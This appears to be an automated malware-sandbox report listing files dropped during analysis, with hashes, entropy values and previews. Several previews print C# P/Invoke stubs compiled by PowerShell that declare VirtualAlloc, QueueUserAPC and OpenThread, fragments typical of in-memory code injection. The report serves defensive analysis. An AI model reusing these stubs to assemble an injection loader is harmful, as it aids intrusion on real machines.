                        SHA1:6C04143209198C63E8E2315435BC3EB3B99BB259
                        SHA-256:6EE40A1F274E2A37AE5C850C15BC241463652ED312820B9CCCAEB7BB1C822CF1
                        SHA-512:F45BE36ED243E5F7F0E496EFE5171BAA7FD1BE3A0F83AB01300C05B09AC10D98897679338F4CFB30F25FC5BCB2D2DE34163BD339B79A65E45DCCEE7A21174603
                        Malicious:false
                        Preview: L.....a.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\uu5u2nmv\CSC63445C49B154491498BDD3FB79A78AC.TMP.................g..{.z..$6Kgu1..........5.......C:\Users\user\AppData\Local\Temp\RES1B16.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.u.5.u.2.n.m.v...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                        C:\Users\user\AppData\Local\Temp\RES451.tmp
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols
                        Category:dropped
                        Size (bytes):1328
                        Entropy (8bit):3.975200179964607
                        Encrypted:false
                        SSDEEP:24:HOe9E26LWbhknZHFhKdNWI+ycuZhN+akS2PNnq9qd:ILtZTKd41ul+a3Kq9K
                        MD5:2997036F1D6399BDEDC49939CBDB26D4
                        SHA1:FBA41FB870A14910B1BC32C973C39C8C80458E93
                        SHA-256:F4A370736333FC785FE73DBD7468D3FF3B2003BE891BDA032A3C2994614A495F
                        SHA-512:D7054F26A09ABB72827D6AA50382AB19950F48954DD8EACE5A7855487516ED0DB28C0BB6AB2C00CB2D740C50D4EDD68B567BE1EA8EDE1B1D17119991413829A9
                        Malicious:false
                        Preview: L.....a.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\nigogz4l\CSCB0FB5A4205944E4B1A4F1A7502114E8.TMP...............,....d.8.O..J.._..........4.......C:\Users\user\AppData\Local\Temp\RES451.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.i.g.o.g.z.4.l...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ccsd0th.iwn.psm1
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview: 1
                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1zreigz2.4ov.ps1
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview: 1
                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_34kodmfv.oiy.psm1
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview: 1
                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cgdeyylx.qwp.psm1
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview: 1
                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gjo40dyp.crc.psm1
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview: 1
                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_karhuzep.53l.ps1
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview: 1
                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pnjjoctr.bdk.ps1
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview: 1
                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ybuxanvq.4gq.ps1
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview: 1
                        C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.0.cs
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text
                        Category:dropped
                        Size (bytes):395
                        Entropy (8bit):5.011724479977666
                        Encrypted:false
                        SSDEEP:6:V/DsYLDS81zuJZFMRSRa+eNMjSSRrh+SRNdDQaAntHQy:V/DTLDfuHV9eg5rh14aAntwy
                        MD5:B1DA1EF961AA0CE50C236459261D955A
                        SHA1:99CF19F188248557193608FE42C1CB88FCF234E1
                        SHA-256:139659D9C1D794242DE8DEFB1E33C785B3B63A691230874656B2B1AFC9E0B26B
                        SHA-512:27C4E9D4D1926A87EB5A2CAFD768D80A9D566C5FE9C7EB17F87453698415B30E251816738388C3171519A74B20AB0919C47C04A1E6CF9E1D82547540DF5E1682
                        Malicious:false
                        Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class ufc. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint ylpxxdj,uint gtjjej);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr mmpi,uint xkljddbswyg,uint jfalf,uint iqbvunafhnr);.. }..}.
                        C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.cmdline
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                        Category:dropped
                        Size (bytes):371
                        Entropy (8bit):5.226640803853184
                        Encrypted:false
                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fReHW6zxs7+AEszI923fReHWRyA:p37Lvkmb6KzJYW6WZE2JYWRyA
                        MD5:0D4DF55C848FD70C7E467D2A26D53F45
                        SHA1:F4B759DBF60B7BD4760AEEE2865A47EA64FE59BC
                        SHA-256:65AD1A8591B4C85B19C20F7CB6F215675131DC225B6397BAC64CF9BA285E7F6C
                        SHA-512:5855ED3F00032735847AA9F6B55DAD2607E959509E5EDCA111693CC59EBDF9F3C298FB6A39940BC5603C94F8A5D60E97788FCE82E9BE48A955013F8D0C00438A
                        Malicious:false
                        Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.0.cs"
                        C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.out
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                        Category:dropped
                        Size (bytes):868
                        Entropy (8bit):5.320286032288214
                        Encrypted:false
                        SSDEEP:24:AId3ka6KzSWbE2SWRy1KaM5DqBVKVrdFAMBJTH:Akka6aSmE2S6y1KxDcVKdBJj
                        MD5:FA46AB7E9BCF97E847F3322DB66934B8
                        SHA1:49552871F35929703C3CD5F33753436E21017849
                        SHA-256:C1CEBB10D75BF73B1B70A7855F8EC4923B79BD07EA173CB98395C0969369AE0F
                        SHA-512:FD5320F3AA7B95C4D9340BAF9358215D08AF44F6A0BEE8A9764E07FA897B4B6FA2E493B87FAF454D1A957B1F95A3CA02854BE2E892471416C046D755BDB8423B
                        Malicious:false
                        Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                        C:\Users\user\AppData\Local\Temp\dtnsoflb\CSC7C356A6CF33949CF872753BDA33569A0.TMP
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        File Type:MSVC .res
                        Category:dropped
                        Size (bytes):652
                        Entropy (8bit):3.073206673156649
                        Encrypted:false
                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryyHak7YnqqpQPN5Dlq5J:+RI+ycuZhNYHakSpQPNnqX
                        MD5:5D58A66193F5DD7122F936E757049652
                        SHA1:21888C5F01076812CAB34CA539D7AFF39C3B8C91
                        SHA-256:0735A78CEDD997EA2580034E6867C7010C496B55B3A12DADD449C590F098EDA2
                        SHA-512:5F45E1D4529795A6627FF8BA212FEC06B42F660D23AF9F53AC57AACD0C5D3C51056CC1B2722AD7AA35EC4CDC8C6531A656AEDA2F28501F112037A71522FC3D80
                        Malicious:false
                        Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.t.n.s.o.f.l.b...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...d.t.n.s.o.f.l.b...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                        C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.0.cs
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text
                        Category:dropped
                        Size (bytes):395
                        Entropy (8bit):5.011724479977666
                        Encrypted:false
                        SSDEEP:6:V/DsYLDS81zuJZFMRSRa+eNMjSSRrh+SRNdDQaAntHQy:V/DTLDfuHV9eg5rh14aAntwy
                        MD5:B1DA1EF961AA0CE50C236459261D955A
                        SHA1:99CF19F188248557193608FE42C1CB88FCF234E1
                        SHA-256:139659D9C1D794242DE8DEFB1E33C785B3B63A691230874656B2B1AFC9E0B26B
                        SHA-512:27C4E9D4D1926A87EB5A2CAFD768D80A9D566C5FE9C7EB17F87453698415B30E251816738388C3171519A74B20AB0919C47C04A1E6CF9E1D82547540DF5E1682
                        Malicious:false
                        Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class ufc. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint ylpxxdj,uint gtjjej);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr mmpi,uint xkljddbswyg,uint jfalf,uint iqbvunafhnr);.. }..}.
                        C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                        Category:dropped
                        Size (bytes):371
                        Entropy (8bit):5.151296249516787
                        Encrypted:false
                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fGYJ/fJrGzxs7+AEszI923fGYJ/fJrb:p37Lvkmb6KzuYJ/fJrGWZE2uYJ/fJrb
                        MD5:C5EAA36B02E3E42DCAC19315987BD2BF
                        SHA1:9E911AD12F0713B3E5C501D19BB86C77472FD22D
                        SHA-256:AA30E86130161DA18E4EB94BB2F46B956D4A23C1359588276525791FED359947
                        SHA-512:1763E1B034A500C4556525E5CCFE1839BC4F342441CC0AD54EEC4F917C0B3ADA905168E8BBFA1447050F154A37F0FBD27945075CB5ADDBEC4A71F41D3C142D5E
                        Malicious:false
                        Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.0.cs"
                        C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.dll
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):3584
                        Entropy (8bit):2.5996985608858223
                        Encrypted:false
                        SSDEEP:24:etGS0/W2dg85xyFODuhxkXdWXoWtkZfOnXF+WI+ycuZhNYHakSpQPNnq:6lkb5xykIktWEJOn1l1ulGa3Cq
                        MD5:49B131E65B23D979BA7ED017BA9C7F61
                        SHA1:E4F38CA7AD5EE7CDD3755D0AF594DCE2EBB29035
                        SHA-256:EDAB1CDD86EBBB84944E94F478BFADF9B7704336C65BE2CF7EF74A2691261512
                        SHA-512:45C0B537C27F0694CD6C31481830D1BB220475DD1638B2A19E4635B90D27CD4BCDF3FD44E5165317C78819FB2700969F759254148F7D13E96999F8F2E577FB7D
                        Malicious:false
                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................#... ...@....... ....................................@..................................#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..X.............................................................(....*BSJB............v4.0.30319......l...H...#~......8...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ H............ P.....P ......].........c.....k.....r.....w...............]. ...]...!.].%...].......*.....3.......6.......H.......P...........
                        C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.out
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                        Category:dropped
                        Size (bytes):868
                        Entropy (8bit):5.289875059357362
                        Encrypted:false
                        SSDEEP:12:xKIR37Lvkmb6KzuYJ/fJrGWZE2uYJ/fJraKaMK4BFNn5KBZvK2wo8dRSgarZucvs:AId3ka6KzZE2gKaM5DqBVKVrdFAMBJTH
                        MD5:5520D1A07EE800264B0E26905CDD21F1
                        SHA1:AB2EBB2894E8B4D6800436C7D1678737430BB273
                        SHA-256:5658F5CB41F431B1472EEF88932E02DEF879A12362D986DFD847F6E7EEA41DA8
                        SHA-512:7C9DB98B82C608CC22A132923F42F1358B08776A033B012C06BFF2B747C28CB72B1C05C13DFA12DFC4E66A1A2F14F614F74329B0BE67CD2086A92D1B1B4A04F2
                        Malicious:false
                        Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                        C:\Users\user\AppData\Local\Temp\nigogz4l\CSCB0FB5A4205944E4B1A4F1A7502114E8.TMP
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        File Type:MSVC .res
                        Category:dropped
                        Size (bytes):652
                        Entropy (8bit):3.0739498574927255
                        Encrypted:false
                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grywak7Ynqq2PN5Dlq5J:+RI+ycuZhN+akS2PNnqX
                        MD5:2C961A918364FF38854F8EC54AF4945F
                        SHA1:B0B1AF0532EAC84BAF2E604E3FF19E39D365B473
                        SHA-256:501BAEF967AAD4AB2AA2F5BFC768E871A8E98381C5AA409ADBCA5E31538DF8F1
                        SHA-512:11EB0EDBDBB19470C827A85E25BDD9989476E58B9E6074C91DD38CCEDD5935B7F23D842A1CFE1E852E6044E385DFDEC0C6B65800FFE5F07813171650BA8F48D7
                        Malicious:false
                        Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...n.i.g.o.g.z.4.l...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...n.i.g.o.g.z.4.l...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                        C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.0.cs
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text
                        Category:dropped
                        Size (bytes):414
                        Entropy (8bit):5.049516587690195
                        Encrypted:false
                        SSDEEP:6:V/DsYLDS81zuJwMRSR7a1f892RV9SRa+rVSSRnA/fsTfaskNDVzy:V/DTLDfuEB92Ru9rV5nA/ETf5EDVzy
                        MD5:66D77EA7A947B910D56CFB0FC4B85BE6
                        SHA1:9D503A2C0DDAEE23A81802CA8444D8B7039ECE6B
                        SHA-256:66E86036222F5D3B474370BBBA04C4A7DECC42D05D25675846CBA63F16877D8B
                        SHA-512:A53181798E577ABD31EE4063903E62171903B369B4FF26C337CC0108BE8883BEE39000A858FB24E92D13CDB89EF5782AADF06B7BD6807DD2D46458F813EE772B
                        Malicious:false
                        Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class yarnha. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr nafifqdmhmh,IntPtr uyeb,IntPtr hpistj);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint ykuvjce,uint ibkrrfwtfdq,IntPtr ljhqnvahhfq);.. }..}.
                        C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                        Category:dropped
                        Size (bytes):371
                        Entropy (8bit):5.199068343906432
                        Encrypted:false
                        SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fjoQ0zxs7+AEszI923fjoG:p37Lvkmb6KzLorWZE2LoG
                        MD5:30EEDF26D86038CE52442382C4102198
                        SHA1:CF34BD8F77949FE161B5776819A519BE39E881D4
                        SHA-256:4FB991BB47038A3CE9017D5F7A9C5AF7437683FB51BD2FD9CE697EF26221ABB7
                        SHA-512:2BC5537B7D3744A654F9E7D7F13A1C1FCA8FD587700BA36940EE021FC814C82C1ED2E07A9296CFF6754E04C199A3830B11B01A8666565CF657157B0CA7BFECC2
                        Malicious:true
                        Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.0.cs"
                        C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.dll
                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):3584
                        Entropy (8bit):2.634144238857034
                        Encrypted:false
                        SSDEEP:24:etGSM8+mUE7R85z7woel/gNE4/eiDPtkZfjgOTrYu3DZ0WI+ycuZhN+akS2PNnq:62XE7S5gG8iyJjg49ZX1ul+a3Kq
                        MD5:833C125BC415845EE1B8A822DC088C02
                        SHA1:D6A1176ACF053B03DA6D519EAB4EB7017B48A0E8
                        SHA-256:996E609A3921946330E840406C64CD8F7AB162B88504BCE05DCA581E264CD7E3
                        SHA-512:000291790C6E39E5F6D5AA5D4F3C5B2C27C411089C4AA55F7FB26E44B7C00E079F7E9B16F5ECFE20253256C51FF572414ECAA138F75C19A0657B2562733D01B4
                        Malicious:false
                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...............(...................................... 9............ F............ Y.....P ......d.........j.....v.....{.....................d. ...d...!.d.%...d.......*.....3.;.....9.......F.......Y...........
                        C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.out
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                        Category:modified
                        Size (bytes):868
                        Entropy (8bit):5.305483822092941
                        Encrypted:false
                        SSDEEP:24:AId3ka6KzLRE2LIKaM5DqBVKVrdFAMBJTH:Akka6aLRE2LIKxDcVKdBJj
                        MD5:F92374784F54FAECD630C33FDA8432E7
                        SHA1:D7EE4FE021D3E360ABE78C8F6D8F0669ADBB8226
                        SHA-256:6D480811F8E381CACFDB17A10A0FDA08081AF31457C33DD74AE5E466667863C9
                        SHA-512:48ABFF4108A6A3B8D2E38632EF7120BB65D6C0BB124D414B3FFF6B6DF64B914BFD926E3F759B4F05C5CF1598CE47D004E24D77C3A5DD504C74D563D917B61394
                        Malicious:false
                        Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
